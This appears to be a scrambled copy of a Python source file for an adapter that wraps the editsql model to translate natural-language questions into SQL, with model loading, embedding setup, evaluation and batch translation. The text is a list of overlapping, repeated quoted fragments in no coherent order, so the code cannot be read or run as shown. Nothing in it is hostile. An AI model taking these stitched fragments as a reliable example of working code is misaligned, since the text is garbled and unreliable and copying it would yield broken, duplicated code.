pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS", "Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False): \"\"\" Evaluate the translation output", "amount default to _all_ examples from the file amount = len(references) # determine", "import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess", "switch enables comparison with the gold queries from spider Args: amount: the amount", 
"utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema", "example[\"interaction_id\"] = 42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql", "# fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i,", "db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions): sql_int = [(prev_predictions[i].split(), [])]", "= \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 # fill the content", "nl_question, db_id): \"\"\" Translate a single natural language question into sql Args: nl_question:", "instead of the prediction results of standalone editsql \"\"\" # load the prediction", "= vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1", "if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:',", "the amount of samples to use randomness: randomly choose samples show_all: write all", "an empty list Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions", "bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb", "output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with the modified version", "init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert = BertModel(bert_config)", "of dicts with values for nl_question and db_id output_dir: path of dir where", "print('vocab_file', 
vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status()", "def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params =", "time from pathlib import Path import numpy as np import json import torch", "nl_q, \"sql\": sql_int}) example[\"final\"][\"utterance\"] = nl_questions[-1] example[\"final\"][\"sql\"] = \"query to be predicted\" #", "filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w') as outfile: json.dump(content,", "params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file)", "is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error", "OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings", "that acts as context prev_predictions: the previous predictions Returns: an InteractionItem that contains", "or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] = not is_error comparison[\"input_seq\"]", "300 # ------- use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size", "SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization", "DB_SCHEMAS_FILE class EditsqlAdapter: \"\"\" Uses the functionality of editsql to translate arbitrary 
questions", "pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer,", "in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"]", "the natural language questions db_id: the database that acts as context prev_predictions: the", "question and the database id \"\"\" # establish the structure of an interaction", "output of EditsqlAdapter. By default the prediction results of standalone editsql act as", "'cS' or params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else:", "\"\"\" # preprocess nl_questions = [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions=[]) prediction =", "natural language question db_id: the database that acts as context prev_nl_questions: the previous", "the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction, db_id):", "else: is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error", "and db_id output_dir: path of dir where the translations are saved \"\"\" edi_adap", "from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from editsql.model.bert.modeling import", "the sql for the next utterance in an interaction Args: nl_question: the natural", "glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded", "= create_word_embeddings(output_vocabulary_schema) return input_vocabulary_embeddings, output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading", "# preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, 
db_id, prev_predictions) prediction", "results gold_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in gold) dev_pred_norm", "'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb] if params.bert_type_abb == 'cS' or params.bert_type_abb", "comparison with the gold queries from spider instead of the prediction results of", "transform the raw interaction to an InteractionItem obj, _ = self.int_load_function(example) interaction =", "_ = self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\"", "{} if use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"]", "write_json_log_results(content, directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path /", "----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings =", "of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if not amount:", "directory Args: input_file: path of file with list of dicts with values for", "= os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint)", "interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip", "db_id, prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language question and", "amount eval_output = dict() eval_output[\"time per item\"] = 
time_per_item eval_output[\"# items\"] = amount", "with values for nl_question and db_id output_dir: path of dir where the translations", "create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None if output_vocabulary_schema: output_vocabulary_schema_embeddings = create_word_embeddings(output_vocabulary_schema) return", "data.anonymizer, database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads the editsql translation model Args:", "= dict() example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general fields", "to translate arbitrary questions into sql \"\"\" def __init__(self, model=\"spider\"): if model ==", "define a modified version with absolute path instead of relative path in the", "edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i, request", "interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def load_model(self, params,", "print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary)", "start = time.time() for i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"]", "params, data): \"\"\" Loads the editsql translation model Args: params: the parsed arguments", "content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\") for i, nl_q in enumerate(nl_questions):", "as f: requests = json.load(f) for i, request in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"],", "'w') as outfile: json.dump(content, outfile, indent=4) # define a modified embeddings loading function", "eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount 
eval_output[\"% equal\"] = accuracy", "acts as context prev_nl_questions: the previous questions or an empty list prev_predictions: the", "file amount = len(references) # determine the instances to test on if randomness:", "is_error = translation_norm != gold_norm else: is_error = translation_norm != dev_pred_norm if is_error:", "eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons", "model.load_word_embeddings = load_word_embeddings_for_editsql # define a modified version with absolute path instead of", "= os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer", "use preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def", "the database that acts as context Returns: the sql prediction \"\"\" # preprocess", "is_error = translation_norm != dev_pred_norm if is_error: num_errors += 1 if is_error or", "database that acts as context prev_nl_questions: the previous questions or an empty list", "output_dir: path of dir where the translations are saved \"\"\" edi_adap = EditsqlAdapter()", "\"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i,", "in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para", "parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params) self.model = self.load_model(params,", "pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def", "makes use of the preloaded glove def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, 
output_vocabulary_schema, params): glove_embedding_size =", "torch.cuda.is_available() else \"cpu\") model_bert.to(device) return model_bert, tokenizer, bert_config # overwrite the original function", "from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval import postprocess_one", "+ [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id)", "Translate a single natural language question into sql Args: nl_question: the natural language", "import postprocess_one from editsql.preprocess import read_database_schema from editsql.model.bert import tokenization as tokenization from", "empty list Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions +", "dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if", "= setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size),", "use_gold_query: comparison[\"prediction\"][\"gold \"] = gold else: comparison[\"prediction\"][\"editsql \"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation", "os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config", "default the prediction results of standalone editsql act as the reference. 
The use_gold_query", "Read the list of dicts with values for nl_question and db_id from the", "previous predictions or an empty list Returns: the sql prediction \"\"\" # preprocess", "randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices = range(amount) comparisons = [] num_errors", "into sql Args: nl_question: the natural language question db_id: the database that acts", "strip the _EOS symbol pred_str = \" \".join(pred_tokens) return pred_str def post_process(self, prediction,", "in raw state example = dict() example[\"final\"] = dict() example[\"interaction\"] = [] #", "self.post_process(prediction, db_id) def translate_interaction(self, nl_question, db_id, prev_nl_questions, prev_predictions): \"\"\" Predict the sql for", "c.isdigit() else c.lower() for c in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else", "= np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0 para_oov = 0", "results of standalone editsql \"\"\" # load the prediction results of standalone editsql", "instead of relative path in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR", "and the database id \"\"\" # establish the structure of an interaction in", "pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" if torch.cuda.is_available() else", "in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \"", "adapters.editsql import parse_args_spider, parse_args_sparc from adapters.editsql.constants import * from api import setup_util from", "if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\")", "= range(amount) comparisons = [] num_errors = 0 
start = time.time() for i", "# function used for loading of interaction in raw state self.int_load_function = load_function(params,", "comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end - start time_per_item", "the output directory Args: input_file: path of file with list of dicts with", "1 if is_error or show_all: comparison = dict() comparison[\"identifier\"] = references[i][\"identifier\"] comparison[\"is_equal\"] =", "the previous questions or an empty list prev_predictions: the previous predictions or an", "amount: the amount of samples to use randomness: randomly choose samples show_all: write", "= True no_pretraining = False bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt')", "\"] = dev_prediction comparison[\"prediction\"][\"translation\"] = translation comparisons.append(comparison) end = time.time() duration = end", "json.dump(content, outfile, indent=4) # define a modified embeddings loading function that makes use", "init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file)", "= parse_args_sparc.interpret_args() else: params = parse_args_spider.interpret_args() # create the dataset and model data", "print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer( vocab_file=vocab_file, do_lower_case=do_lower_case) bert_config.print_status() model_bert =", "Args: nl_questions: the natural language questions db_id: the database that acts as context", "if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device = torch.device(\"cuda\" 
if", "outfile, indent=4) # define a modified embeddings loading function that makes use of", "loading of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas) def", "= time.time() duration = end - start time_per_item = duration / amount num_correct", "with list of dicts with values for nl_question and db_id output_dir: path of", "in enumerate(requests): request[\"sql\"] = edi_adap.translate(request[\"nl_question\"], request[\"db_id\"]) write_json_log_results(requests, output_dir) def write_json_log_results(content, directory): path =", "amount - num_errors accuracy = num_correct * 100 / amount eval_output = dict()", "reference. The use_gold_query switch enables comparison with the gold queries from spider Args:", "save the translations to a file in the output directory Args: input_file: path", "batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read the list of dicts with values for nl_question", "db_id: the database that acts as context prev_nl_questions: the previous questions or an", "numpy as np import json import torch from editsql.data_util import atis_batch from editsql.data_util.atis_data", "params = parse_args_spider.interpret_args() # create the dataset and model data = ATISDataset(params) self.model", "ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={})", "prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str = \" \".join(pred_tokens)", "prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile) if", "else c.lower() for c in gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower()", "self.int_load_function(example) interaction = atis_batch.InteractionItem(obj) return interaction def 
translate(self, nl_question, db_id): \"\"\" Translate a", "\"\"\" # establish the structure of an interaction in raw state example =", "amount eval_output[\"% equal\"] = accuracy if show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] =", "\"\"\" def __init__(self, model=\"spider\"): if model == \"sparc\": params = parse_args_sparc.interpret_args() else: params", "i in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw)", "the input file and save the translations to a file in the output", "with absolute path instead of relative path in the first line def get_bert(params):", "params.bert_type_abb == 'cL' or params.bert_type_abb == 'mcS': do_lower_case = False else: do_lower_case =", "be predicted\" # transform the raw interaction to an InteractionItem obj, _ =", "preloaded glove ----------- glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab):", "of standalone editsql act as the reference. 
The use_gold_query switch enables comparison with", "range(amount) comparisons = [] num_errors = 0 start = time.time() for i in", "the structure of an interaction in raw state example = dict() example[\"final\"] =", "data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for", "path of file with list of dicts with values for nl_question and db_id", "instances to test on if randomness: sample_indices = random.sample(range(len(references)), k=amount) else: sample_indices =", "= glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total',", "in the first line def get_bert(params): BERT_PT_PATH = str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb =", "100 / amount eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"]", "questions or an empty list prev_predictions: the previous predictions or an empty list", "show_all: eval_output[\"content\"] = comparisons else: eval_output[\"diff\"] = comparisons write_json_log_results(eval_output, CURRENT_DIR / \"evaluation/results\") #", "general fields example[\"id\"] = \"dummy id\" example[\"scenario\"] = \"\" example[\"interaction_id\"] = 42 #", "tokenizer, bert_config # overwrite the original function with the modified version utils_bert.get_bert =", "editsql act as the reference. 
The use_gold_query switch enables comparison with the gold", "interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural language question into", "example[\"final\"] = dict() example[\"interaction\"] = [] # fill the general fields example[\"id\"] =", "dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation =", "amount of samples to use randomness: randomly choose samples show_all: write all samples,", "def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens = vocab.inorder_tokens glove_oov = 0", "= str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL':", "tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider, parse_args_sparc", "an InteractionItem that contains the natural language question and the database id \"\"\"", "from spider instead of the prediction results of standalone editsql \"\"\" # load", "natural language question into sql Args: nl_question: the natural language question db_id: the", "translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in translation) if use_gold_query:", "glove_embeddings = setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab),", "str(TRANSLATORS_DIR / \"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16',", "{'uS': 'uncased_L-12_H-768_A-12', 'uL': 
'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'} bert_type = map_bert_type_abb[params.bert_type_abb]", "schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False, use_gold_query=False):", "= not is_error comparison[\"input_seq\"] = in_seq comparison[\"prediction\"] = {} if use_gold_query: comparison[\"prediction\"][\"gold \"]", "amount num_correct = amount - num_errors accuracy = num_correct * 100 / amount", "= dict() eval_output[\"time per item\"] = time_per_item eval_output[\"# items\"] = amount eval_output[\"% equal\"]", "questions db_id: the database that acts as context prev_predictions: the previous predictions Returns:", "self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction = \" \".join(dev_prediction_raw) dev_prediction = postprocess_one(dev_prediction, schema) translation", "sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions,", "num_correct * 100 / amount eval_output = dict() eval_output[\"time per item\"] = time_per_item", "= atis_batch.InteractionItem(obj) return interaction def translate(self, nl_question, db_id): \"\"\" Translate a single natural", "in sample_indices: db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema", "from spider Args: amount: the amount of samples to use randomness: randomly choose", "self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw = prediction[-1][0] pred_tokens", "saved \"\"\" edi_adap = EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for", "state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, 
database_schema=self.database_schemas) def load_model(self, params, data): \"\"\" Loads", "language question into sql Args: nl_question: the natural language question db_id: the database", "as the reference. The use_gold_query switch enables comparison with the gold queries from", "output_vocabulary_embeddings, output_vocabulary_schema_embeddings, input_embedding_size # overwrite the original embeddings loading function with the modified", "db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction =", "for loading of interaction in raw state self.int_load_function = load_function(params, data.entities_dictionary, data.anonymizer, database_schema=self.database_schemas)", "= EditsqlAdapter() with open(input_file) as f: requests = json.load(f) for i, request in", "print(\"Loaded model from file \" + params.save_file) model.eval() return model def prepare_interaction(self, nl_questions,", "the natural language question db_id: the database that acts as context prev_nl_questions: the", "question db_id: the database that acts as context prev_nl_questions: the previous questions or", "language question and the database id \"\"\" # establish the structure of an", "list of dicts with values for nl_question and db_id from the input file", "1000) pred_tokens_raw = prediction[-1][0] pred_tokens = pred_tokens_raw[:-1] # strip the _EOS symbol pred_str", "else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \" + params.save_file) model.eval() return model", "db_id): schema = self.database_schemas[db_id] post_processed = postprocess_one(prediction, schema) return post_processed # ------------ Evaluation", "from the file amount = len(references) # determine the instances to test on", "database id \"\"\" # establish the structure of an interaction in raw state", "data.anonymizer if params.anonymize and params.anonymization_scoring 
else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file \"", "path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename), 'w')", "from pathlib import Path import numpy as np import json import torch from", "import load_function from editsql.model import model, utils_bert from editsql.model.schema_interaction_model import SchemaInteractionATISModel from editsql.postprocess_eval", "Returns: an InteractionItem that contains the natural language question and the database id", "prev_predictions): \"\"\" Creates an InteractionItem that contains the natural language question and the", "self.predict(interaction) return self.post_process(prediction, db_id) def predict(self, interaction): prediction = self.model.predict_with_predicted_queries(interaction, 1000) pred_tokens_raw =", "db_id = references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id]", "Predict the sql for the next utterance in an interaction Args: nl_question: the", "\"editsql/model/bert/data/annotated_wikisql_and_PyTorch_bert_param\") map_bert_type_abb = {'uS': 'uncased_L-12_H-768_A-12', 'uL': 'uncased_L-24_H-1024_A-16', 'cS': 'cased_L-12_H-768_A-12', 'cL': 'cased_L-24_H-1024_A-16', 'mcS': 'multi_cased_L-12_H-768_A-12'}", "bert_config_file = os.path.join(BERT_PT_PATH, f'bert_config_{bert_type}.json') vocab_file = os.path.join(BERT_PT_PATH, f'vocab_{bert_type}.txt') init_checkpoint = os.path.join(BERT_PT_PATH, f'pytorch_model_{bert_type}.bin') print('bert_config_file',", "= references[i][\"database_id\"] in_seq_raw = references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw", "comparison with the gold queries from spider Args: amount: the amount of samples", "== 'mcS': do_lower_case = False else: do_lower_case = True no_pretraining = False bert_config_file", 
"random import time from pathlib import Path import numpy as np import json", "establish the structure of an interaction in raw state example = dict() example[\"final\"]", "= BertModel(bert_config) if no_pretraining: pass else: model_bert.load_state_dict(torch.load(init_checkpoint, map_location='cpu')) print(\"Load pre-trained parameters.\") device =", "references[i][\"input_seq\"] in_seq = \" \".join(in_seq_raw) schema = self.database_schemas[db_id] dev_prediction_raw = references[i][\"flat_prediction\"] dev_prediction =", "setup_util.glove_embeddings # --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32)", "\"\"\" Uses the functionality of editsql to translate arbitrary questions into sql \"\"\"", "the ATISDataset Returns: the loaded SchemaInteractionATISModel \"\"\" model = SchemaInteractionATISModel( params, data.input_vocabulary, data.output_vocabulary,", "* 100 / amount eval_output = dict() eval_output[\"time per item\"] = time_per_item eval_output[\"#", "0 for token in vocabulary_tokens: token_id = vocab.token_to_id(token) if token in glove_embeddings: vocabulary_embeddings[token_id][:glove_embedding_size]", "glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab))", "'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings = create_word_embeddings(input_vocabulary) output_vocabulary_embeddings = create_word_embeddings(output_vocabulary) output_vocabulary_schema_embeddings = None", "f'pytorch_model_{bert_type}.bin') print('bert_config_file', bert_config_file) print('vocab_file', vocab_file) print('init_checkpoint', init_checkpoint) bert_config = BertConfig.from_json_file(bert_config_file) tokenizer = tokenization.FullTokenizer(", "def translate(self, nl_question, db_id): \"\"\" Translate a single natural language question into 
sql", "file in the output directory Args: input_file: path of file with list of", "and prevent numbering from distorting the results gold_norm = ''.join(\"0\" if c.isdigit() else", "# --------------------------------------- input_embedding_size = glove_embedding_size def create_word_embeddings(vocab): vocabulary_embeddings = np.zeros((len(vocab), glove_embedding_size), dtype=np.float32) vocabulary_tokens", "= ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={},", "num_errors accuracy = num_correct * 100 / amount eval_output = dict() eval_output[\"time per", "a modified embeddings loading function that makes use of the preloaded glove def", "data.output_vocabulary_schema, data.anonymizer if params.anonymize and params.anonymization_scoring else None) model.load_state_dict(torch.load(params.save_file,map_location='cpu')) print(\"Loaded model from file", "the prediction results of standalone editsql with open(EVAL_REFERENCE_FILE) as infile: references = json.load(infile)", "+= 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov, 'Total', len(vocab)) return vocabulary_embeddings input_vocabulary_embeddings", "data = ATISDataset(params) self.model = self.load_model(params, data) _, _, self.database_schemas = read_database_schema(DB_SCHEMAS_FILE, schema_tokens={},", "directory): path = Path(directory) filename = time.strftime(\"%Y_%m_%d-%H_%M_%S\") + \".json\" with open(str(path / filename),", "= read_database_schema(DB_SCHEMAS_FILE, schema_tokens={}, column_names={}, database_schemas_dict={}) # function used for loading of interaction in", "the functionality of editsql to translate arbitrary questions into sql \"\"\" def __init__(self,", "\"evaluation/results\") # ------------ Batch processing ----------------- @classmethod def batch_translate(cls, input_file=BATCH_INPUT_FILE, output_dir=BATCH_OUTPUT_DIR): \"\"\" Read", "= json.load(infile) if not amount: # 
let amount default to _all_ examples from", "[nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction, db_id) def", "prev_nl_questions + [nl_question] interaction = self.prepare_interaction(nl_questions, db_id, prev_predictions) prediction = self.predict(interaction) return self.post_process(prediction,", "vocabulary_embeddings[token_id][:glove_embedding_size] = glove_embeddings[token] else: glove_oov += 1 print('Glove OOV:', glove_oov, 'Para OOV', para_oov,", "def load_word_embeddings_for_editsql(input_vocabulary, output_vocabulary, output_vocabulary_schema, params): glove_embedding_size = 300 # ------- use preloaded glove", "postprocess_one(prediction, schema) return post_processed # ------------ Evaluation ----------------- def evaluate(self, amount=0, randomness=False, show_all=False,", "gold) dev_pred_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in dev_prediction) translation_norm", "in dev_prediction) translation_norm = ''.join(\"0\" if c.isdigit() else c.lower() for c in translation)", "database id Args: nl_questions: the natural language questions db_id: the database that acts", "import tokenization as tokenization from editsql.model.bert.modeling import BertConfig, BertModel from adapters.editsql import parse_args_spider,", "list Returns: the sql prediction \"\"\" # preprocess nl_questions = prev_nl_questions + [nl_question]", "spider instead of the prediction results of standalone editsql \"\"\" # load the", "InteractionItem that contains the natural language question and the database id Args: nl_questions:", "= 42 # fill the content fields example[\"database_id\"] = db_id prev_predictions.append(\"dummy sql query\")", "= postprocess_one(gold, schema) # normalize and prevent numbering from distorting the results gold_norm", "Args: input_file: path of file with list of dicts with values for nl_question", 
